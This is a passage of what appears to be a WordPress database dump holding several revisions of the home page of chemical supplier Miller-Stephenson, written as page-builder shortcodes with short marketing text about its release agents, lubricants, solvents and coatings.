link="epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col]\n\n[ux_banner height="120px" bg="233" hover="zoom"]\n\n[text_box width="40" width__sm="60" animate="fadeIn" position_x="100" position_y="0" text_align="right"]\n\n[button text="MEDICAL\r\nCHEMICALS" style="primary" size="medium" link="chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[ux_banner height="10px"]\n\n[text_box width="80" width__sm="60" animate="fadeIn"]\n\n\n[/text_box]\n\n[/ux_banner]\n[ux_banner height="270px" bg="91" hover="zoom" link="chemicals/vazo/"]\n\n[text_box width="40" width__sm="60" animate="fadeIn" position_x="100" position_y="0" text_align="right"]\n\n[button text="VAZO\r\nRADICAL INITIATORS" style="primary" size="medium" link="chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/row]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="gloss" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1259" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="595"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1261"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1257"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 15:49:54', '2016-09-11 15:49:54', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1491, 1, '2016-09-11 15:51:32', '2016-09-11 15:51:32', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 15:51:32', '2016-09-11 15:51:32', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1492, 1, '2016-09-11 15:52:55', '2016-09-11 15:52:55', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 15:52:55', '2016-09-11 15:52:55', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1493, 1, '2016-09-11 15:53:31', '2016-09-11 15:53:31', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="white" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 15:53:31', '2016-09-11 15:53:31', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1494, 1, '2016-09-11 15:55:18', '2016-09-11 15:55:18', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white" text_color="white" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 15:55:18', '2016-09-11 15:55:18', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1495, 1, '2016-09-11 15:55:53', '2016-09-11 15:55:53', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white" text_color="white" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply 